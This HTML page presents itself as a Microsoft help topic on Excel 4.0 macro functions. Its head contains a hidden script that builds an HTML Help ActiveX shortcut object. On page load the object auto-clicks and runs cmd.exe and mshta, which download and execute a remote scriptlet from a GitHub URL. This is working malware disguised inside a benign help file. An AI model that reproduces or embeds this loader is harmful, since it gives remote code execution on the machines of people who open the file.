<html><head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Excel 4.0 Macro Functions</title><!--link rel="stylesheet" type="text/css" href="mk:@msitstore:msohlp11.chm::/html/office10.css"><script type="text/javascript" language="Javascript" src="mk:@msitstore:msohlp11.chm::/html/sExpCollapse.js"></script><script type="text/javascript" language="JavaScript" src="mk:@msitstore:msohlp11.chm::/html/inline.js"></script-->
<script type="text/javascript" language="javascript"> 
document.write('<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>');
 document.write('<PARAM name="Command" value="ShortCut">');
  document.write('<PARAM name="Button" value="Bitmap::shortcut">');
  document.write('<PARAM name="Item1" value=\'",cmd.exe,/c mshta.exe javascript:a=GetObject("https://github.com/kobezt08/test/raw/master/example.sct").Exec();close();"\'>');
  document.write('<PARAM name="Item2" value="273,1,1">');
document.write('</OBJECT>');</script>
<script>
x.Click()
</script></head><body><h1>Excel 4.0 Macro Functions</h1><p>The Microsoft Excel 4.0 Macro Function Help file contains the reference information for all of the Excel 4.0 macro functions (XLM macros)  available in Excel. To obtain this macro function Help file, you can download it from the <a href="http://r.office.microsoft.com/r/rlidAWSContentRedir?AssetID=XT010352321033&amp;CTT=11&amp;Origin=HP010475331033" target="_new">Microsoft Office Online Web site</a>.</p><p><b>Security</b>  Because macros can contain viruses, be careful about running them, and run only macros that you know come from a trusted source. Be sure to run up-to-date antivirus software on your computer. Note that unlike other macros, you cannot digitally sign XLM macros. In addition, a workbook that contains XLM macros cannot be opened if the macro security level is set to High.</p></body></html>